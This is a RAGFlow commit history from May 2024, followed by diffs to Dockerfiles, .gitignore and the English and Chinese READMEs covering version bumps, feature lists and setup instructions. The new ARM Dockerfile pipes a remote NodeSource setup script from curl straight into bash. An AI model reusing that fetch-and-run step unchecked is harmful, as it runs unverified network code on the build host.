2dd705fe68 feat: add feishu oauth (#815)
### What problem does this PR solve?

Adds Feishu OAuth to the back-end code.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: yonghui li <yonghui.li@bondex.com.cn>
2024-05-17 13:47:05 +08:00
d1614107e2 fix stream chat for ollama (#816)
### What problem does this PR solve?

#709

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 12:07:00 +08:00
05fa3aeb08 use smaller docker images (#813)
### What problem does this PR solve?

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 09:00:24 +08:00
e73ce39b66 Add 2 embeding models from OpenAI (#812)
### What problem does this PR solve?

#810 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 08:51:29 +08:00
d54d1375a5 Initial draft of configure knowledge base (#794)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-05-16 21:27:09 +08:00
c6c9dbde64 feat: Support for conversational streaming (#809)
### What problem does this PR solve?

feat: Support for conversational streaming
#709

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-05-16 20:15:02 +08:00
95f809187e add stream chat (#811)
### What problem does this PR solve?

#709 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-16 20:14:53 +08:00
d6772f5dd7 add version (#807)
### What problem does this PR solve?
#709 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-16 16:17:48 +08:00
63ca15c595 Fix a bug in 'assistant-setting.tsx' that causes the upload button to… (#796)
… incorrectly appear on the model settings page.

### What problem does this PR solve?

This is an issue with the Upload component on the assistant-setting
page. I use the show variable to explicitly control the button component
within it.

see:

![20240516000417](https://github.com/infiniflow/ragflow/assets/37476944/de88f911-6dbd-412d-a981-86cf60aa2257)


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Other (please describe): Add the local models that DeepDoc depends
on to the gitignore file in dev mode.

Signed-off-by: liuchao <lcjia_you@126.com>
2024-05-16 10:49:41 +08:00
7b144cc086 fix: can't capitalize file or folder name (#798)
### What problem does this PR solve?


#792 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-16 09:10:29 +08:00
1c4e92ed35 Knowledge base search is case sensitive (#797)
### What problem does this PR solve?
#793 
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-16 09:00:12 +08:00
10e83f26dc Added file management guide (#788)
### What problem does this PR solve?

Added guide with instructions on managing files in RAGFlow. 

### Type of change

- [x] Documentation Update
2024-05-15 20:02:41 +08:00
6ff63ee2ba Support for code files parse (#789)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 16:34:28 +08:00
GYH
12b4c5668c Updated conversation_api.md document/upload (#787)
### What problem does this PR solve?

Updated conversation_api.md document/upload parameter description

### Type of change

- [x] Documentation Update
2024-05-15 16:33:28 +08:00
baad35df30 fix: .knowledgebase folder can be deleted bug and change "Add file to knowledge base" to "Link file to knowledge base" bug (#786)
### What problem does this PR solve?
fix: the .knowledgebase folder could be deleted
fix: change "Add file to knowledge base" to "Link file to knowledge
base"
#783 #784

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-15 14:53:36 +08:00
5effbfac80 fix: remove Top K in retrieval testing #770 and if the document parsing fails, the error message returned by the backend is displayed (#782)
### What problem does this PR solve?

fix: remove Top K in retrieval testing  #770
fix: if the document parsing fails, the error message returned by the
backend is displayed.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-15 13:58:30 +08:00
4d47b2b459 fix a string format error (#781)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-15 13:02:31 +08:00
d8c080ee52 fix bugs in searching file using keywords (#780)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-15 12:51:57 +08:00
GYH
626ace8639 Updated document upload method (#777)
### What problem does this PR solve?

In api_app.py, `/document/upload` gains two optional parameters:

- parser_id: one of
[naive, qa, resume, manual, table, paper, book, laws, presentation, picture, one]
- run: 1
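
A small sketch of validating the two optional parameters before sending them as form fields. The helper name is hypothetical, the list is copied from the description with `qaresume` read as `qa` and `resume` (an assumption), and nothing here is confirmed as the endpoint's actual request format.

```python
# Parser IDs as listed in the PR description; splitting "qaresume" into
# "qa" and "resume" is an assumption.
PARSER_IDS = {
    "naive", "qa", "resume", "manual", "table", "paper",
    "book", "laws", "presentation", "picture", "one",
}


def optional_upload_fields(parser_id=None, run=None) -> dict:
    """Build the optional form fields, omitting any that were not given."""
    fields = {}
    if parser_id is not None:
        if parser_id not in PARSER_IDS:
            raise ValueError(f"unknown parser_id: {parser_id!r}")
        fields["parser_id"] = parser_id
    if run is not None:
        # Form values are sent as strings.
        fields["run"] = str(run)
    return fields
```

Because both parameters are optional, an empty dict is a valid result and existing callers that send neither field are unaffected.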

### Type of change
- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 12:22:11 +08:00
1e923f1c90 Update README (#779)
### What problem does this PR solve?

#771 

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-15 12:08:32 +08:00
234afb25d8 feat: support GPT-4o #771 and hide the add button when the folder is a knowledge base (#775)
### What problem does this PR solve?

feat: support GPT-4o  #771 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 11:34:57 +08:00
aa1c915d6e support gpt-4o (#773)
### What problem does this PR solve?
#771 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 11:16:08 +08:00
77b1520b66 Refactor message output format (#772)
### What problem does this PR solve?


### Type of change

- [x] Refactoring

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-15 10:48:42 +08:00
6b06ccead4 Miscellaneous updates (#769)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-05-14 18:46:39 +08:00
282f0857a3 fix: hide the add button when the folder is a knowledge base (#765)
### What problem does this PR solve?

#764 fix: hide the add button when the folder is a knowledge base

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-14 16:53:32 +08:00
d7744f5870 Refactor method name (#760)
### What problem does this PR solve?

#757

### Type of change

- [x] Refactoring

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-14 14:48:15 +08:00
9b21b66f23 Create quickstart.md (#743)
### What problem does this PR solve?

Draft quickstart. 

### Type of change

- [x] Documentation Update
2024-05-14 12:22:33 +08:00
aa03dfa453 fix bug of get file (#746)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-13 14:02:38 +08:00
69b7c61498 fix: typo in user_app.py (#740)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Other (please describe): Fix typo
2024-05-13 09:25:45 +08:00
8769619bb1 Update readme (#741)
### What problem does this PR solve?

Update readme.

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-12 13:40:47 +08:00
ffe5737f7d let index be batchly. (#733)
### What problem does this PR solve?

Index documents in batches.

### Type of change


- [x] Refactoring
2024-05-11 19:47:53 +08:00
04a9e95161 let file in knowledgebases visible in file manager (#714)
### What problem does this PR solve?

Make files in knowledge bases visible in the file manager.
#162 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-11 16:04:28 +08:00
91b4a18c47 Make the app name configurable even after the project is built (#731)
### What problem does this PR solve?

Make the app name configurable even after the project is built #730 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-11 16:03:07 +08:00
33eaf6fa2e docs: update README_ja.md (#707)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-05-10 11:22:40 +08:00
d65ba3e4d7 feat: delete the added model #503 and display an error message when the requested file fails to parse #684 (#708)
### What problem does this PR solve?

feat: delete the added model #503
feat: display an error message when the requested file fails to parse
#684

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-10 10:38:39 +08:00
bef1bbdf3e Update README with Detailed WebUI Service Launch Instructions (#694)
### What problem does this PR solve?

Improve README by detailing Launch Service from Source section

This commit enhances the README document by adding comprehensive steps
for running the WebUI service in the 'Launch Service from Source'
section. It aims to provide clearer guidance for users attempting to
start the service from the source code, making the setup process more
accessible and understandable.

Key changes include:
- Detailed instructions for setting up and running the WebUI service.
- Necessary prerequisites for launching the service from source.

This update ensures that users have all the information they need to
successfully launch the service, improving the overall usability of our
project.

### Type of change

- [x] Documentation Update
2024-05-10 09:48:50 +08:00
6b36f31f92 Minor editorial updates (#700)
### What problem does this PR solve?

Editorial updates only. 

### Type of change

- [x] Documentation Update
2024-05-10 09:48:24 +08:00
648a2baaa9 fix disabled doc is still retreivalable (#695)
### What problem does this PR solve?

Fix: a disabled document could still be retrieved.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-09 15:32:24 +08:00
9392b8bc8f 0509 faq (#693)
### What problem does this PR solve?

Editorial updates only. 

### Type of change

- [x] Documentation Update
2024-05-09 12:37:45 +08:00
4153a36683 truncate text to fitin embedding model (#692)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-05-09 11:35:08 +08:00
GYH
bca63ad571 Update faq.md (#685)
### What problem does this PR solve?

Updated FAQ: How to upgrade RAGFlow

### Type of change

- [x] Documentation Update
2024-05-09 11:32:36 +08:00
793e29f23a fix: fix uploaded file time error #680 (#690)
### What problem does this PR solve?

fix: fix uploaded file time error #680
feat: support preview of word and excel #684 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-09 11:30:15 +08:00
99be226c7c fix coordinate error (#686)
### What problem does this PR solve?

#683 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-08 20:00:14 +08:00
7ddb2f19be make sure to raise exception if redis is not there (#674)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-05-08 15:20:45 +08:00
c28f7b5d38 make sure the error will be recorded. (#672)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-05-08 13:58:41 +08:00
521 changed files with 72946 additions and 10988 deletions

7
.gitignore vendored
View File

@ -29,3 +29,10 @@ Cargo.lock
docker/ragflow-logs/
/flask_session
/logs
rag/res/deepdoc
# Exclude sdk generated files
sdk/python/ragflow.egg-info/
sdk/python/build/
sdk/python/dist/
sdk/python/ragflow_sdk.egg-info/

View File

@ -1,4 +1,4 @@
FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
FROM infiniflow/ragflow-base:v2.0
USER root
WORKDIR /ragflow
@ -10,11 +10,14 @@ ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./agent ./agent
ADD ./graphrag ./graphrag
ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com
ADD docker/entrypoint.sh ./entrypoint.sh
ADD docker/.env ./
RUN chmod +x ./entrypoint.sh
ENTRYPOINT ["./entrypoint.sh"]

34
Dockerfile.arm Normal file
View File

@ -0,0 +1,34 @@
FROM python:3.11
USER root
WORKDIR /ragflow
COPY requirements_arm.txt /ragflow/requirements.txt
RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"
RUN apt-get update && \
apt-get install -y curl gnupg && \
rm -rf /var/lib/apt/lists/*
RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
ADD ./web ./web
RUN cd ./web && npm i --force && npm run build
ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./agent ./agent
ADD ./graphrag ./graphrag
ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com
ADD docker/entrypoint.sh ./entrypoint.sh
ADD docker/.env ./
RUN chmod +x ./entrypoint.sh
ENTRYPOINT ["./entrypoint.sh"]

View File

@ -1,11 +1,11 @@
FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
FROM infiniflow/ragflow-base:v2.0
USER root
WORKDIR /ragflow
## for cuda > 12.0
RUN /root/miniconda3/envs/py11/bin/pip uninstall -y onnxruntime-gpu
RUN /root/miniconda3/envs/py11/bin/pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
RUN pip uninstall -y onnxruntime-gpu
RUN pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
ADD ./web ./web
@ -15,6 +15,8 @@ ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./agent ./agent
ADD ./graphrag ./graphrag
ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

View File

@ -30,6 +30,8 @@ ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./requirements.txt ./requirements.txt
ADD ./agent ./agent
ADD ./graphrag ./graphrag
RUN apt install openmpi-bin openmpi-common libopenmpi-dev
ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH

View File

@ -30,6 +30,8 @@ ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./requirements.txt ./requirements.txt
ADD ./agent ./agent
ADD ./graphrag ./graphrag
RUN dnf install -y openmpi openmpi-devel python3-openmpi
ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH

225
README.md
View File

@ -17,16 +17,70 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.5.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.5.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.9.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.9.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>
<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>
<details open>
<summary></b>📕 Table of Contents</b></summary>
- 💡 [What is RAGFlow?](#-what-is-ragflow)
- 🎮 [Demo](#-demo)
- 📌 [Latest Updates](#-latest-updates)
- 🌟 [Key Features](#-key-features)
- 🔎 [System Architecture](#-system-architecture)
- 🎬 [Get Started](#-get-started)
- 🔧 [Configurations](#-configurations)
- 🛠️ [Build from source](#-build-from-source)
- 🛠️ [Launch service from source](#-launch-service-from-source)
- 📚 [Documentation](#-documentation)
- 📜 [Roadmap](#-roadmap)
- 🏄 [Community](#-community)
- 🙌 [Contributing](#-contributing)
</details>
## 💡 What is RAGFlow?
[RAGFlow](https://demo.ragflow.io) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
## 🎮 Demo
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>
## 🔥 Latest Updates
- 2024-08-02 Supports GraphRAG inspired by [graphrag](https://github.com/microsoft/graphrag) , and mind map.
- 2024-07-23 Supports audio file parsing.
- 2024-07-21 Supports more LLMs (LocalAI, OpenRouter, StepFun, and Nvidia).
- 2024-07-18 Adds more components (Wikipedia, PubMed, Baidu, and Duckduckgo) to the graph.
- 2024-07-08 Supports workflow based on [Graph](./graph/README.md).
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method.
- 2024-06-27 Supports extracting images from Docx files.
- 2024-06-27 Supports extracting tables from Markdown files.
- 2024-06-06 Supports [Self-RAG](https://huggingface.co/papers/2310.11511), which is enabled by default in dialog settings.
- 2024-05-30 Integrates [BCE](https://github.com/netease-youdao/BCEmbedding) and [BGE](https://github.com/FlagOpen/FlagEmbedding) reranker models.
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
- 2024-05-15 Integrates OpenAI GPT-4o.
## 🌟 Key Features
@ -56,17 +110,6 @@
- Multiple recall paired with fused re-ranking.
- Intuitive APIs for seamless integration with business.
## 📌 Latest Features
- 2024-05-08 Integrates LLM DeepSeek.
- 2024-04-26 Adds file management.
- 2024-04-19 Supports conversation API ([detail](./docs/conversation_api.md)).
- 2024-04-16 Integrates an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding), and [FastEmbed](https://github.com/qdrant/fastembed), which is designed specifically for light and speedy embedding.
- 2024-04-11 Supports [Xinference](./docs/xinference.md) for local LLM deployment.
- 2024-04-10 Adds a new layout recognition model for analyzing Laws documentation.
- 2024-04-08 Supports [Ollama](./docs/ollama.md) for local LLM deployment.
- 2024-04-07 Supports Chinese UI.
## 🔎 System Architecture
<div align="center" style="margin-top:20px;margin-bottom:20px;">
@ -85,7 +128,7 @@
### 🚀 Start up the server
1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/max_map_count.md)):
1. Ensure `vm.max_map_count` >= 262144:
> To check the value of `vm.max_map_count`:
>
@ -114,12 +157,14 @@
3. Build the pre-built Docker images and start up the server:
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.
```bash
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```
> Please note that running the above commands will automatically download the development version docker image of RAGFlow. If you want to download and run a specific version of docker image, please find the RAGFLOW_VERSION variable in the docker/.env file, change it to the corresponding version, for example, RAGFLOW_VERSION=v0.5.0, and run the above commands.
> The core image is about 9 GB in size and may take a while to load.
@ -147,10 +192,10 @@
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
> With default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
> See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for more information.
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
_The show is now on!_
@ -187,69 +232,106 @@ $ chmod +x ./entrypoint.sh
$ docker compose up -d
```
## 🛠️ Launch Service from Source
## 🛠️ Launch service from source
To launch the service from source, please follow these steps:
To launch the service from source:
1. Clone the repository
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
```
1. Clone the repository:
2. Create a virtual environment (ensure Anaconda or Miniconda is installed)
```bash
$ conda create -n ragflow python=3.11.0
$ conda activate ragflow
$ pip install -r requirements.txt
```
If CUDA version is greater than 12.0, execute the following additional commands:
```bash
$ pip uninstall -y onnxruntime-gpu
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
```
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
```
3. Copy the entry script and configure environment variables
```bash
$ cp docker/entrypoint.sh .
$ vi entrypoint.sh
```
Use the following commands to obtain the Python path and the ragflow project path:
```bash
$ which python
$ pwd
```
2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
Set the output of `which python` as the value for `PY` and the output of `pwd` as the value for `PYTHONPATH`.
```bash
$ conda create -n ragflow python=3.11.0
$ conda activate ragflow
$ pip install -r requirements.txt
```
```bash
# If your CUDA version is higher than 12.0, run the following additional commands:
$ pip uninstall -y onnxruntime-gpu
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
```
If `LD_LIBRARY_PATH` is already configured, it can be commented out.
3. Copy the entry script and configure environment variables:
```bash
# Adjust configurations according to your actual situation; the two export commands are newly added.
PY=${PY}
export PYTHONPATH=${PYTHONPATH}
# Optional: Add Hugging Face mirror
export HF_ENDPOINT=https://hf-mirror.com
```
```bash
# Get the Python path:
$ which python
# Get the ragflow project path:
$ pwd
```
```bash
$ cp docker/entrypoint.sh .
$ vi entrypoint.sh
```
4. Start the base services
```bash
$ cd docker
$ docker compose -f docker-compose-base.yml up -d
```
```bash
# Adjust configurations according to your actual situation (the following two export commands are newly added):
# - Assign the result of `which python` to `PY`.
# - Assign the result of `pwd` to `PYTHONPATH`.
# - Comment out `LD_LIBRARY_PATH`, if it is configured.
# - Optional: Add Hugging Face mirror.
PY=${PY}
export PYTHONPATH=${PYTHONPATH}
export HF_ENDPOINT=https://hf-mirror.com
```
5. Check the configuration files
Ensure that the settings in **docker/.env** match those in **conf/service_conf.yaml**. The IP addresses and ports for related services in **service_conf.yaml** should be changed to the local machine IP and ports exposed by the container.
4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
6. Launch the service
```bash
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```
```bash
$ cd docker
$ docker compose -f docker-compose-base.yml up -d
```
5. Check the configuration files, ensuring that:
- The settings in **docker/.env** match those in **conf/service_conf.yaml**.
- The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
6. Launch the RAGFlow backend service:
```bash
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```
7. Launch the frontend service:
```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ vim .umirc.ts
# Update proxy.target to http://127.0.0.1:9380
$ npm run dev
```
8. Deploy the frontend service:
```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ umi build
$ mkdir -p /ragflow/web
$ cp -r dist /ragflow/web
$ apt install nginx -y
$ cp ../docker/nginx/proxy.conf /etc/nginx
$ cp ../docker/nginx/nginx.conf /etc/nginx
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
$ systemctl start nginx
```
## 📚 Documentation
- [FAQ](./docs/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)
## 📜 Roadmap
@ -259,7 +341,8 @@ See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
## 🙌 Contributing
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) first.
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.


@ -17,16 +17,48 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.5.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.5.0"></a>
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.9.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.9.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>
<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>
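## 💡 What is RAGFlow?
[RAGFlow](https://demo.ragflow.io) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. Combined with LLMs (large language models), it provides reliable question answering backed by well-founded citations from data in a variety of complex formats, and offers a RAG workflow suited to businesses of any scale.
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. Combined with LLMs (large language models), it provides reliable question answering backed by well-founded citations from data in a variety of complex formats, and offers a RAG workflow suited to businesses of any scale.
## 🎮 Demo
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).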
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>
## 🔥 Latest Updates
- 2024-08-02 Supports GraphRAG, inspired by [graphrag](https://github.com/microsoft/graphrag), and mind maps.
- 2024-07-23 Supports parsing audio files.
- 2024-07-21 Supports more LLM suppliers (LocalAI/OpenRouter/StepFun/Nvidia).
- 2024-07-18 Adds more components (Wikipedia/PubMed/Baidu/Duckduckgo) to the graph.
- 2024-07-08 Supports [Graph](./graph/README.md)-based workflows.
- 2024-06-27 The Q&A parsing method supports Markdown and Docx files.
- 2024-06-27 Supports extracting images from Docx files.
- 2024-06-27 Supports extracting tables from Markdown files.
- 2024-06-06 Supports [Self-RAG](https://huggingface.co/papers/2310.11511), which is enabled by default in the conversation settings.
- 2024-05-30 Integrates the [BCE](https://github.com/netease-youdao/BCEmbedding) and [BGE](https://github.com/FlagOpen/FlagEmbedding) rerankers.
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
- 2024-05-15 Integrates OpenAI GPT-4o.
## 🌟 Key Features
@ -56,18 +88,6 @@
- Multiple recall paired with fused re-ranking.
- Intuitive APIs for seamless integration with business.
## 📌 Latest Features
- 2024-05-08
- 2024-04-26 Adds the 'File Management' feature.
- 2024-04-19 Supports the conversation API ([detail](./docs/conversation_api.md)).
- 2024-04-16 Adds the embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding).
- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) is designed for light and speedy embedding.
- 2024-04-11 Supports [Xinference](./docs/xinference.md) for local LLM deployment.
- 2024-04-10 Adds a new layout recognition model for the 'Laws' method.
- 2024-04-08 Supports [Ollama](./docs/ollama.md) for local deployment of large models.
- 2024-04-07 Supports a Chinese UI.
## 🔎 System Architecture
<div align="center" style="margin-top:20px;margin-bottom:20px;">
@ -86,7 +106,7 @@
### 🚀 Start up the server
1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/max_map_count.md)):
1. Ensure `vm.max_map_count` >= 262144:
> To check the value of `vm.max_map_count`:
>
@ -121,7 +141,7 @@
$ docker compose up -d
```
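> Running the above commands automatically downloads the development version of the RAGFlow Docker image. To download and run a specific version of the Docker image, find the RAGFLOW_VERSION variable in the docker/.env file and change it to the corresponding version, for example RAGFLOW_VERSION=v0.5.0, then run the above commands.
> Running the above commands automatically downloads the development version of the RAGFlow Docker image. To download and run a specific version of the Docker image, find the RAGFLOW_VERSION variable in the docker/.env file and change it to the corresponding version, for example RAGFLOW_VERSION=v0.9.0, then run the above commands.
> The core image is about 9 GB in size and may take a while to load.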
@ -152,7 +172,7 @@
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (port number omitted), because the default HTTP serving port `80` can be left out.
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
> See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for more information.
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
_Initial setup is complete; the show is now on!_
@ -183,7 +203,7 @@
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
